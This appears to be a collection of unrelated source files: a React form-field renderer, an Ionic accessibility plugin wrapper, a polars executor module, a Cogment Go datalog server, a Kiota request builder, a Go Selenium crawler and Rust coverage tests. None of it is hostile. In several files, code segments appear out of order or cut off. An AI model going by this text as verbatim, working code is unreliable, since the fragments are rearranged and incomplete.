{...rest} {...fieldProps} type={type} onChange={(e, value) => handleFieldChange(fieldKey, value)} disabled={disabled || fieldProps.disabled} />; case "checkbox": return ( <SingleCheckbox {...rest} {...fieldProps} style={{ marginTop: "27px" }} onCheck={(e) => handleFieldChange(fieldKey, e.target.checked)} disabled={disabled || fieldProps.disabled} /> ); case "label": return <Label {...rest} {...fieldProps} />; case "singleValueList": return ( <DropDown {...rest} {...fieldProps} dropDownData={fieldProps.dropDownData || []} onChange={(e, value, selectedValue) => handleFieldChange(fieldKey, selectedValue)} /> ); case "textFieldIcon": return ( <TextFieldIcon iconPosition="right" Icon={Icon} {...fieldProps} {...rest} onIconClick={ iconRedirectionURL ? () => { window.open(iconRedirectionURL); } : () => onTextFieldIconClick() } onChange={(e, value) => handleFieldChange(fieldKey, value)} /> ); case "autoSuggestDropdown": return ( <AutoSuggestDropdown {...rest} {...fieldProps} dataSource={fieldProps && fieldProps.dropDownData || []} onChange={(chosenRequest, index) => { handleFieldChange(fieldKey, chosenRequest.value); }} /> ); case "radioButton": return ( <div> {visible !== false ? 
<RadioButton {...rest} {...fieldProps} style={styles.radioButtonStyle} options={fieldProps && fieldProps.options || []} radioButtonItemStyle={styles.radioButtonItemStyle} radioButtonLabelStyle={styles.radioButtonLabelStyle} selectedLabelStyle={styles.selectedLabelStyle} className={`radio-button-${fieldProps.id}`} iconStyle={styles.iconStyle} labelStyle={styles.radioButtonLabelStyle} valueSelected={fieldProps.value} handleChange={(e, value) => { handleFieldChange(fieldKey, value); }} ></RadioButton> : ""} </div> ); case "AutocompleteDropdown": return ( <AutosuggestContainer id={fieldProps.id} type={fieldProps.type} required={fieldProps.required} jsonPath={fieldProps.jsonPath} localePrefix={fieldProps.localePrefix} data={fieldProps && fieldProps.dropDownData} className="autocomplete-dropdown" label={{ labelKey: fieldProps.floatingLabelText }} placeholder={{ labelKey: fieldProps.hintText }} labelsFromLocalisation={fieldProps.labelsFromLocalisation} gridDefination={fieldProps.gridDefination} toolTip={fieldProps.toolTip} toolTipMessage={fieldProps.toolTipMessage} boundary={fieldProps.boundary} errorMessage={fieldProps.errorMessage} errorStyle={fieldProps.errorStyle} pattern={fieldProps.pattern} value={fieldProps.value} defaultSort={fieldProps.defaultSort} canFetchValueFromJsonpath={false} formName={fieldProps.formName} isClearable={true} disabled={disabled || fieldProps.disabled} onChange={(chosenRequest, index) => { handleFieldChange(fieldKey, chosenRequest.target.value, fieldProps.jsonPath); }} /> ); default: return null; } }; return renderField(); }; export default Field;
letterSpacing: 0.6,
index.ts
import { Plugin, Cordova, IonicNativePlugin } from '@ionic-native/core'; import { Injectable } from '@angular/core'; /** * @name Mobile Accessibility * @description * This plugin exposes information on the status of various accessibility features of mobile operating systems, including, for example, whether a screen reader is running, invert colors is enabled, and the preferred scaling for text. * It also allows an application to send a string to be spoken by the screen reader, or a command to stop the screen reader from speaking. * * @usage * ```typescript * import { MobileAccessibility } from 'ionic-native'; * * * constructor(private mobileAccessibility: MobileAccessibility) { } * * ... * * this.mobileAccessibility.isScreenReaderRunning().then((isRunning: boolean) => console.log(isRunning)); * * ``` */ @Plugin({ pluginName: 'MobileAccessibility', plugin: 'phonegap-plugin-mobile-accessibility', pluginRef: 'MobileAccessibility', repo: 'https://github.com/phonegap/phonegap-mobile-accessibility', platforms: ['Android Fire OS', 'Android', 'iOS', 'Windows'] }) @Injectable() export class MobileAccessibility extends IonicNativePlugin { MobileAccessibilityNotifications: { ANNOUNCEMENT: 'ANNOUNCEMENT', BOLD_TEXT_STATUS_CHANGED: 'BOLD_TEXT_STATUS_CHANGED', CLOSED_CAPTIONING_STATUS_CHANGED: 'CLOSED_CAPTIONING_STATUS_CHANGED', DARKER_SYSTEM_COLORS_STATUS_CHANGED: 'DARKER_SYSTEM_COLORS_STATUS_CHANGED', GRAYSCALE_STATUS_CHANGED: 'GRAYSCALE_STATUS_CHANGED', GUIDED_ACCESS_STATUS_CHANGED: 'GUIDED_ACCESS_STATUS_CHANGED', INVERT_COLORS_STATUS_CHANGED: 'INVERT_COLORS_STATUS_CHANGED', LAYOUT_CHANGED: 'LAYOUT_CHANGED', MONO_AUDIO_STATUS_CHANGED: 'MONO_AUDIO_STATUS_CHANGED', PAGE_SCROLLED: 'PAGE_SCROLLED', REDUCE_MOTION_STATUS_CHANGED: 'REDUCE_MOTION_STATUS_CHANGED', REDUCE_TRANSPARENCY_STATUS_CHANGED: 'REDUCE_TRANSPARENCY_STATUS_CHANGED', SCREEN_CHANGED: 'SCREEN_CHANGED', SCREEN_READER_STATUS_CHANGED: 'SCREEN_READER_STATUS_CHANGED', SPEAK_SCREEN_STATUS_CHANGED: 'SPEAK_SCREEN_STATUS_CHANGED', SPEAK_SELECTION_STATUS_CHANGED: 'SPEAK_SELECTION_STATUS_CHANGED', SWITCH_CONTROL_STATUS_CHANGED: 'SWITCH_CONTROL_STATUS_CHANGED', TOUCH_EXPLORATION_STATUS_CHANGED: 'TOUCH_EXPLORATION_STATUS_CHANGED' }; /** * Makes an asynchronous call to native MobileAccessibility to determine if a screen reader is running. * @returns {Promise<boolean>} A result method to receive the boolean result asynchronously from the native MobileAccessibility plugin. */ @Cordova() isScreenReaderRunning(): Promise<boolean> { return; } /** * An iOS-specific proxy for the MobileAccessibility.isScreenReaderRunning method. * @returns {Promise<boolean>} A result method to receive the boolean result asynchronously from the native MobileAccessibility plugin. */ @Cordova({ platforms: ['iOS'] }) isVoiceOverRunning(): Promise<boolean> { return; } /** * An Android/Amazon Fire OS-specific proxy for the MobileAccessibility.isScreenReaderRunning method. * @returns {Promise<boolean>} A result method to receive the boolean result asynchronously from the native MobileAccessibility plugin. */ @Cordova({ platforms: ['Amazon Fire OS', 'Android'] }) isTalkBackRunning(): Promise<boolean> { return; } /** * On Android, this method returns true if ChromeVox is active and properly initialized with access to the text to speech API in the WebView. * If TalkBack is running but ChromeVox is not active, this method is useful to alert the user of a potential problem. 
* @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['Amazon Fire OS', 'Android'] }) isChromeVoxActive(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isBoldTextEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova() isClosedCaptioningEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isDarkerSystemColorsEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isGrayscaleEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isGuidedAccessEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isInvertColorsEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isMonoAudioEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isReduceMotionEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isReduceTransparencyEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isSpeakScreenEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isSpeakSelectionEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isSwitchControlRunning(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['Amazon Fire OS', 'Android'] }) isTouchExplorationEnabled(): Promise<boolean> { return; } /** * * * @returns {Promise<number>} Returns the result */ @Cordova() getTextZoom(): Promise<number> { return; } /** * @param textZoom {number} A percentage value by which text in the WebView should be scaled. */ @Cordova({ sync: true }) setTextZoom(textZoom: number): void { } /** * */ @Cordova({ sync: true }) updateTextZoom(): void { } /** * A Boolean value which specifies whether to use the preferred text zoom of a default percent value of 100. * @param value {boolean} Returns the result */ @Cordova({ sync: true }) usePreferredTextZoom(value: boolean): void { } /**
* Posts a notification with a string for the screen reader to announce if it is running. * @param mobileAccessibilityNotification {any} * @param value {string} A string to be announced by a screen reader. * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) postNotification(mobileAccessibilityNotification: any, value: string): Promise<boolean> { return; } /** * Speaks a given string through the screen reader. On Android, if ChromeVox is active, it will use the specified queueMode and properties. * @param value {string} * @param queueMode {number} * @param properties {any} */ @Cordova({ sync: true }) speak(value: string, queueMode?: number, properties?: any): void { } /** * Stops speech. */ @Cordova({ sync: true }) stop(): void { } }
mod.rs
pub mod cache; pub mod drop_duplicates; pub mod explode; pub mod filter; pub mod groupby; pub mod join; pub mod melt; pub mod scan; pub mod slice; pub mod sort; pub mod stack; pub mod udf; pub mod various; use super::*; use crate::logical_plan::FETCH_ROWS; use itertools::Itertools; use polars_core::POOL; use rayon::prelude::*; use std::io::Seek; use std::path::PathBuf; const POLARS_VERBOSE: &str = "POLARS_VERBOSE"; fn set_n_rows(stop_after_n_rows: Option<usize>) -> Option<usize> { let fetch_rows = FETCH_ROWS.with(|fetch_rows| fetch_rows.get()); match fetch_rows { None => stop_after_n_rows, Some(n) => Some(n), } } pub(crate) fn evaluate_physical_expressions( df: &DataFrame, exprs: &[Arc<dyn PhysicalExpr>], state: &ExecutionState, ) -> Result<DataFrame> { let height = df.height(); let mut selected_columns = POOL.install(|| { exprs .par_iter() .map(|expr| expr.evaluate(df, state)) .collect::<Result<Vec<Series>>>() })?; // If all series are the same length it is ok. If not we can broadcast Series of length one. if selected_columns.len() > 1 { let all_equal_len = selected_columns.iter().map(|s| s.len()).all_equal(); if !all_equal_len { selected_columns = selected_columns .into_iter()
series.expand_at_index(0, height) } else { series } }) .collect() } } Ok(DataFrame::new_no_checks(selected_columns)) }
.map(|series| { if series.len() == 1 && height > 1 {
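The selection logic in evaluate_physical_expressions above broadcasts any length-1 column up to the frame height when the selected columns disagree in length. A minimal sketch of that rule, re-expressed in Go purely for illustration (the function name and slice types here are hypothetical and not part of polars):

package main

import "fmt"

// broadcastColumns mirrors the rule described above: columns that already
// match the target height are kept, length-1 columns are repeated to the
// target height, and any other mismatch is an error.
func broadcastColumns(cols [][]float64, height int) ([][]float64, error) {
	out := make([][]float64, 0, len(cols))
	for i, col := range cols {
		switch {
		case len(col) == height:
			out = append(out, col)
		case len(col) == 1:
			expanded := make([]float64, height)
			for j := range expanded {
				expanded[j] = col[0] // repeat the single value
			}
			out = append(out, expanded)
		default:
			return nil, fmt.Errorf("column %d has length %d, expected %d or 1", i, len(col), height)
		}
	}
	return out, nil
}

func main() {
	cols := [][]float64{{1, 2, 3}, {10}} // second column is broadcast
	res, err := broadcastColumns(cols, 3)
	fmt.Println(res, err) // [[1 2 3] [10 10 10]] <nil>
}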
datalogServer.go
// Copyright 2022 AI Redefined Inc. <[email protected]> // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package grpcservers import ( "context" "io" "strings" grpcapi "github.com/cogment/cogment/grpcapi/cogment/api" "github.com/cogment/cogment/services/trialDatastore/backend" "github.com/openlyinc/pointy" "google.golang.org/grpc" "google.golang.org/grpc/codes" "google.golang.org/grpc/metadata" "google.golang.org/grpc/status" ) type datalogServer struct { grpcapi.UnimplementedDatalogSPServer backend backend.Backend } func actorIndexFromActorName(actorName string, actorIndices map[string]uint32) int32 { actorIndex, found := actorIndices[actorName] if !found { // If the actor is not found we consider it is the environment // TODO maybe use the actual environment "actor name" return -1 } return int32(actorIndex) } func trialSampleFromDatalogSample( trialID string, actorIndices map[string]uint32, datalogSample *grpcapi.DatalogSample, trialActors []*grpcapi.ActorParams, ) (*grpcapi.StoredTrialSample, error) { // Base stuffs sample := grpcapi.StoredTrialSample{ UserId: "", TrialId: trialID, TickId: datalogSample.Info.TickId, Timestamp: datalogSample.Info.Timestamp, State: datalogSample.Info.State, ActorSamples: make([]*grpcapi.StoredTrialActorSample, len(actorIndices)), Payloads: make([][]byte, 0), } // Initializing the actor samples for actorIndex := range sample.ActorSamples { sample.ActorSamples[actorIndex] = &grpcapi.StoredTrialActorSample{ Actor: uint32(actorIndex), } } // Deal with the observations if datalogSample.Observations != nil { payloadIndexFromObsIndex := make([]uint32, len(datalogSample.Observations.Observations)) for obsIndex, obsData := range datalogSample.Observations.Observations { payload := obsData payloadIndexFromObsIndex[obsIndex] = uint32(len(sample.Payloads)) sample.Payloads = append(sample.Payloads, payload) } for actorIndex, obsIndex := range datalogSample.Observations.ActorsMap { sample.ActorSamples[actorIndex].Observation = &payloadIndexFromObsIndex[obsIndex] } } // Deal with the actions { for actorIndex, action := range datalogSample.Actions { payload := action.Content payloadIndex := uint32(len(sample.Payloads)) sample.Payloads = append(sample.Payloads, payload) sample.ActorSamples[actorIndex].Action = &payloadIndex } } // Deal with the rewards { rewardAccumulator := make(map[uint32][]*grpcapi.RewardSource) for _, reward := range datalogSample.Rewards { // Potential wildcards in receiver name var rewardedActorIndices []uint32 splitName := strings.Split(reward.ReceiverName, ".") if reward.ReceiverName == "*" || reward.ReceiverName == "*.*" { for _, index := range actorIndices { rewardedActorIndices = append(rewardedActorIndices, index) } } else if len(splitName) > 1 { className := splitName[0] actorName := splitName[1] for index, actorParam := range trialActors { if actorParam.GetActorClass() == className && (actorName == "*" || actorName == actorParam.Name) { rewardedActorIndices = append(rewardedActorIndices, uint32(index)) } } } else { // Find actor sample that 
matches the reward index, exists := actorIndices[reward.ReceiverName] if exists { rewardedActorIndices = append(rewardedActorIndices, index) } else { log.WithField("receiver_name", reward.ReceiverName).Debug( "Unrecognized receiver name, not logging the reward") } } for _, actorIndex := range rewardedActorIndices { // Store the reward sources for aggregation later _, exists := rewardAccumulator[actorIndex] if !exists { rewardAccumulator[actorIndex] = make([]*grpcapi.RewardSource, 0) } for _, sourceReward := range reward.Sources { rewardAccumulator[actorIndex] = append(rewardAccumulator[actorIndex], sourceReward) var payloadIndex *uint32 if sourceReward.UserData != nil && len(sourceReward.UserData.Value) > 0 { payloadIndex = pointy.Uint32(uint32(len(sample.Payloads))) sample.Payloads = append(sample.Payloads, sourceReward.UserData.Value) } senderactorIndex := actorIndexFromActorName(sourceReward.SenderName, actorIndices) receivedReward := grpcapi.StoredTrialActorSampleReward{ Sender: senderactorIndex, Reward: sourceReward.Value, Confidence: sourceReward.Confidence, UserData: payloadIndex, } sample.ActorSamples[actorIndex].ReceivedRewards = append( sample.ActorSamples[actorIndex].ReceivedRewards, &receivedReward, ) if senderactorIndex >= 0 { sentReward := grpcapi.StoredTrialActorSampleReward{ Receiver: int32(actorIndex), Reward: sourceReward.Value, Confidence: sourceReward.Confidence, UserData: payloadIndex, } sample.ActorSamples[senderactorIndex].SentRewards = append( sample.ActorSamples[senderactorIndex].SentRewards, &sentReward, ) } } } } for actorIndex, sourcesList := range rewardAccumulator { // The total reward for an actor is the average value weighted by the confidence valueAccum := float32(0.0) confidenceAccum := float32(0.0) for _, source := range sourcesList { if source.Confidence > 0 { valueAccum += source.Value * source.Confidence confidenceAccum += source.Confidence } } if confidenceAccum > 0 { valueAccum /= confidenceAccum } sample.ActorSamples[actorIndex].Reward = pointy.Float32(valueAccum) } } // Deal with the messages { for _, message := range datalogSample.Messages { payloadIndex := uint32(len(sample.Payloads)) sample.Payloads = append(sample.Payloads, message.Payload.Value) receiveractorIndex := actorIndexFromActorName(message.ReceiverName, actorIndices) senderactorIndex := actorIndexFromActorName(message.SenderName, actorIndices) if receiveractorIndex >= 0 { receivedMessage := grpcapi.StoredTrialActorSampleMessage{ Sender: senderactorIndex, Payload: payloadIndex, } sample.ActorSamples[receiveractorIndex].ReceivedMessages = append( sample.ActorSamples[receiveractorIndex].ReceivedMessages, &receivedMessage, ) } if senderactorIndex >= 0 { sentMessage := grpcapi.StoredTrialActorSampleMessage{ Receiver: receiveractorIndex, Payload: payloadIndex, } sample.ActorSamples[senderactorIndex].SentMessages = append( sample.ActorSamples[senderactorIndex].SentMessages, &sentMessage, ) } } } return &sample, nil } func (s *datalogServer) RunTrialDatalog(stream grpcapi.DatalogSP_RunTrialDatalogServer) error { ctx := stream.Context() md, ok := metadata.FromIncomingContext(ctx) if !ok { return status.Errorf(codes.DataLoss, "DatalogServer.RunTrialDatalog: failed to get metadata") } trialIDs := md.Get("trial-id") if len(trialIDs) == 0 { return status.Errorf(codes.InvalidArgument, "DatalogServer.RunTrialDatalog: missing required header \"trial-id\"") } trialID := trialIDs[0] actorIndices := make(map[string]uint32) // Receive the first element, it should be trial data req, err := stream.Recv() 
if err != nil { return err } trialParams := req.GetTrialParams() if trialParams == nil { return status.Errorf( codes.InvalidArgument, "DatalogServer.RunTrialDatalog: initial message is not of type \"cogment.TrialParams\"", ) } err = s.backend.CreateOrUpdateTrials( ctx, []*backend.TrialParams{{TrialID: trialID, UserID: "log exporter server", Params: trialParams}}, ) if err != nil { return status.Errorf(codes.Internal, "DatalogServer.RunTrialDatalog: internal error %q", err) } // Acknowledge the handling of the first "params" message err = stream.Send(&grpcapi.RunTrialDatalogOutput{}) if err != nil { return err } for actorIndex, actorConfig := range trialParams.GetActors() { actorIndices[actorConfig.Name] = uint32(actorIndex) } for { req, err := stream.Recv() if err == io.EOF { return nil } if err != nil { return err } sample := req.GetSample() if sample == nil { return status.Errorf( codes.InvalidArgument, "DatalogServer.RunTrialDatalog: body message is not of type \"cogment.DatalogSample\"", ) } trialSample, err := trialSampleFromDatalogSample(trialID, actorIndices, sample, trialParams.GetActors()) if err != nil { return status.Errorf(codes.Internal, "DatalogServer.RunTrialDatalog: internal error %q", err) } err = s.backend.AddSamples(ctx, []*grpcapi.StoredTrialSample{trialSample}) if err != nil { return status.Errorf(codes.Internal, "DatalogServer.RunTrialDatalog: internal error %q", err) } // Acknowledge the handling of the following "sample" message err = stream.Send(&grpcapi.RunTrialDatalogOutput{}) if err != nil { return err } } } func (s *datalogServer) Version(context.Context, *grpcapi.VersionRequest) (*grpcapi.VersionInfo, error) { return nil, status.Errorf(codes.Unimplemented, "DatalogServer.Version not implemented") } // RegisterDatalogServer registers a DatalogServer to a gRPC server. func
(grpcServer grpc.ServiceRegistrar, backend backend.Backend) error { server := &datalogServer{ backend: backend, } grpcapi.RegisterDatalogSPServer(grpcServer, server) return nil }
RegisterDatalogServer
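The reward aggregation in trialSampleFromDatalogSample above computes an actor's total reward as the confidence-weighted average of its reward sources, skipping sources with non-positive confidence. A small, self-contained Go sketch of that rule (the type and function names are illustrative only, not part of the gRPC API):

package main

import "fmt"

// rewardSource mirrors the two fields used by the aggregation loop above.
type rewardSource struct {
	Value      float32
	Confidence float32
}

// aggregateReward reproduces the rule from trialSampleFromDatalogSample:
// the total reward is the confidence-weighted average of all sources with
// a positive confidence.
func aggregateReward(sources []rewardSource) float32 {
	var valueAccum, confidenceAccum float32
	for _, s := range sources {
		if s.Confidence > 0 {
			valueAccum += s.Value * s.Confidence
			confidenceAccum += s.Confidence
		}
	}
	if confidenceAccum > 0 {
		valueAccum /= confidenceAccum
	}
	return valueAccum
}

func main() {
	// Two sources: value 1 with confidence 1 and value 3 with confidence 3,
	// so the aggregate is (1*1 + 3*3) / (1 + 3) = 2.5.
	fmt.Println(aggregateReward([]rewardSource{{1, 1}, {3, 3}}))
}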
restore_request_builder.go
package restore import ( i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f "github.com/microsoft/kiota-abstractions-go" ) // RestoreRequestBuilder provides operations to call the restore method. type RestoreRequestBuilder struct { // Path parameters for the request pathParameters map[string]string // The request adapter to use to execute the requests. requestAdapter i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestAdapter // Url template to use to build the URL for the current request builder urlTemplate string } // RestoreRequestBuilderPostRequestConfiguration configuration for the request such as headers, query parameters, and middleware options. type RestoreRequestBuilderPostRequestConfiguration struct { // Request headers Headers map[string]string // Request options Options []i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestOption } // NewRestoreRequestBuilderInternal instantiates a new RestoreRequestBuilder and sets the default values. func NewRestoreRequestBuilderInternal(pathParameters map[string]string, requestAdapter i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestAdapter)(*RestoreRequestBuilder) { m := &RestoreRequestBuilder{ } m.urlTemplate = "{+baseurl}/me/joinedGroups/{group%2Did}/sites/{site%2Did}/lists/{list%2Did}/items/{listItem%2Did}/documentSetVersions/{documentSetVersion%2Did}/microsoft.graph.restore"; urlTplParams := make(map[string]string) for idx, item := range pathParameters { urlTplParams[idx] = item } m.pathParameters = urlTplParams; m.requestAdapter = requestAdapter; return m } // NewRestoreRequestBuilder instantiates a new RestoreRequestBuilder and sets the default values. func NewRestoreRequestBuilder(rawUrl string, requestAdapter i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestAdapter)(*RestoreRequestBuilder) { urlParams := make(map[string]string) urlParams["request-raw-url"] = rawUrl return NewRestoreRequestBuilderInternal(urlParams, requestAdapter) } // CreatePostRequestInformation invoke action restore func (m *RestoreRequestBuilder) CreatePostRequestInformation()(*i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestInformation, error) { return m.CreatePostRequestInformationWithRequestConfiguration(nil); } // CreatePostRequestInformationWithRequestConfiguration invoke action restore func (m *RestoreRequestBuilder) CreatePostRequestInformationWithRequestConfiguration(requestConfiguration *RestoreRequestBuilderPostRequestConfiguration)(*i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestInformation, error) { requestInfo := i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.NewRequestInformation() requestInfo.UrlTemplate = m.urlTemplate requestInfo.PathParameters = m.pathParameters requestInfo.Method = i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.POST if requestConfiguration != nil { requestInfo.AddRequestHeaders(requestConfiguration.Headers) requestInfo.AddRequestOptions(requestConfiguration.Options) } return requestInfo, nil } // Post invoke action restore func (m *RestoreRequestBuilder) Post()(error) { return m.PostWithRequestConfigurationAndResponseHandler(nil, nil); } // PostWithRequestConfigurationAndResponseHandler invoke action restore func (m *RestoreRequestBuilder) PostWithRequestConfigurationAndResponseHandler(requestConfiguration *RestoreRequestBuilderPostRequestConfiguration, responseHandler 
i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.ResponseHandler)(error) { requestInfo, err := m.CreatePostRequestInformationWithRequestConfiguration(requestConfiguration); if err != nil
err = m.requestAdapter.SendNoContentAsync(requestInfo, responseHandler, nil) if err != nil { return err } return nil }
{ return err }
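A possible usage sketch for the RestoreRequestBuilder above, assuming a Kiota RequestAdapter (authentication, serialization, base URL) has already been configured elsewhere; the import path of the generated restore package is hypothetical:

package example

import (
	abstractions "github.com/microsoft/kiota-abstractions-go"
	restore "example.com/generated/restore" // hypothetical import path for the generated package
)

// restoreDocumentSetVersion builds the request builder from a raw URL and
// sends the POST; the restore action returns no body, so Post only reports
// an error.
func restoreDocumentSetVersion(adapter abstractions.RequestAdapter, rawURL string) error {
	builder := restore.NewRestoreRequestBuilder(rawURL, adapter)
	return builder.Post()
}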
entry.go
package crawler import ( "fmt" "log" "os" "strconv" "sync" "github.com/pkg/errors" "github.com/rs/zerolog" "github.com/tebeka/selenium" "github.com/tebeka/selenium/firefox" "github.com/topics/sysexec" ) type Crawler struct { Mutex sync.Mutex URL string SeleniumPath string GeckoDriverPath string Port int WebDriver *selenium.WebDriver } var ( CR_DailyTrading = "DailyTrading" CR_DailyTradingRatio = "DailyTradingRatio" CR_Highlight = "Highlight" CR_StockInfo = "StockInfo" CR_TAIEX = "TAIEX" ) var c *Crawler func StartWebInstance() (*selenium.Service, *Crawler)
func Get() *Crawler { return c } func (c *Crawler) GOTO() { if err := (*c.WebDriver).Get(c.URL); err != nil { log.Panic(errors.Wrap(err, fmt.Sprintf("Connect to %s", c.URL))) } } func (c *Crawler) LogJob(zlog *zerolog.Event, jobName string) *zerolog.Event { zlog. Str("type", "Crawler"). Str("server", "Topics"). Str("cronjob", jobName) return zlog } func getElenentText(element *selenium.WebElement) string { value, err := (*element).Text() if err != nil { return "" } return value }
{ // Check if there is an instance already running and kill it if pid := sysexec.FindWebDriverPID(os.Getenv("WEB_INSTANCE_PORT")); pid != nil { sysexec.KillWebDriver(pid) } port, err := strconv.Atoi(os.Getenv("WEB_INSTANCE_PORT")) if err != nil { log.Fatal(errors.Wrap(err, "WebDriver can't get correct port number")) } crawler := Crawler{ URL: "https://www.google.com", SeleniumPath: os.Getenv("SELENIUM"), GeckoDriverPath: os.Getenv("GECKO_DRIVER"), Port: port, } // Start a Selenium WebDriver server instance (if one is not already running). opts := []selenium.ServiceOption{ selenium.StartFrameBuffer(), // Start an X frame buffer for the browser to run in. selenium.GeckoDriver(crawler.GeckoDriverPath), // Specify the path to GeckoDriver in order to use Firefox. // selenium.Output(os.Stderr), // Output debug information to STDERR. } // selenium.SetDebug(true) service, err := selenium.NewSeleniumService(crawler.SeleniumPath, crawler.Port, opts...) if err != nil { log.Fatal(errors.Wrap(err, "Selenium WebInstance start")) return nil, nil } // Connect to the WebDriver instance running locally. caps := selenium.Capabilities{"browserName": "firefox"} firefoxCaps := firefox.Capabilities{ Args: []string{ "--headless", }, } caps.AddFirefox(firefoxCaps) wd, err := selenium.NewRemote(caps, fmt.Sprintf("http://localhost:%d/wd/hub", crawler.Port)) if err != nil { log.Fatal(errors.Wrap(err, "Connect to WebDriver")) } crawler.WebDriver = &wd c = &crawler return service, c }
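A minimal sketch of how StartWebInstance might be driven from a main package, assuming the SELENIUM, GECKO_DRIVER, and WEB_INSTANCE_PORT environment variables are set. Service.Stop and WebDriver.Quit come from github.com/tebeka/selenium; the crawler package import path shown is hypothetical:

package main

import (
	"log"

	"github.com/topics/crawler" // hypothetical module path for the crawler package above
)

func main() {
	service, c := crawler.StartWebInstance()
	if service == nil || c == nil {
		log.Fatal("failed to start the Selenium web instance")
	}
	defer service.Stop()        // stop the Selenium service
	defer (*c.WebDriver).Quit() // close the browser session

	c.GOTO() // navigate to the crawler's configured URL
}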
tests.rs
use crate::source_analysis::prelude::*; use syn::parse_file; #[test] fn logical_lines_let_bindings() { let config = Config::default(); let mut analysis = SourceAnalysis::new(); let ctx = Context { config: &config, file_contents: "fn foo() { let x = 5; }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert_eq!(lines.logical_lines.get(&3).copied(), Some(2)); assert_eq!(lines.logical_lines.get(&4).copied(), Some(2)); let ctx = Context { config: &config, file_contents: "fn foo() { let x = (0..15).iter() .filter(|x| { if x % 3 == 0 { true } else { false } }) .cloned() .collect::<Vec<u32>>(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.logical_lines.contains_key(&4)); assert!(!lines.logical_lines.contains_key(&5)); assert!(!lines.logical_lines.contains_key(&6)); assert!(!lines.logical_lines.contains_key(&7)); assert!(!lines.logical_lines.contains_key(&8)); assert!(!lines.logical_lines.contains_key(&9)); assert!(!lines.logical_lines.contains_key(&10)); assert!(!lines.logical_lines.contains_key(&11)); } #[test] fn match_pattern_logical_lines() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn foo(num: i32) -> bool { match num { 1 | 3 | 5 | 7 | 9 => { true }, _ => false, } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert_eq!(lines.logical_lines.get(&4), Some(&3)); assert_eq!(lines.logical_lines.get(&5), Some(&3)); assert_eq!(lines.logical_lines.get(&6), Some(&3)); assert_eq!(lines.logical_lines.get(&7), Some(&3)); assert_ne!(lines.logical_lines.get(&8), Some(&3)); } #[test] fn line_analysis_works() { let mut la = LineAnalysis::new(); assert!(!la.should_ignore(0)); assert!(!la.should_ignore(10)); la.add_to_ignore([3, 4, 10]); assert!(la.should_ignore(3)); assert!(la.should_ignore(4)); assert!(la.should_ignore(10)); assert!(!la.should_ignore(1)); } #[test] fn filter_str_literals() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn test() { writeln!(#\"test \ttest \ttest\"#); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.len() > 1); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); let ctx = Context { config: &config, file_contents: "fn test() { write(\"test test test\"); } fn write(s:&str){}", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser 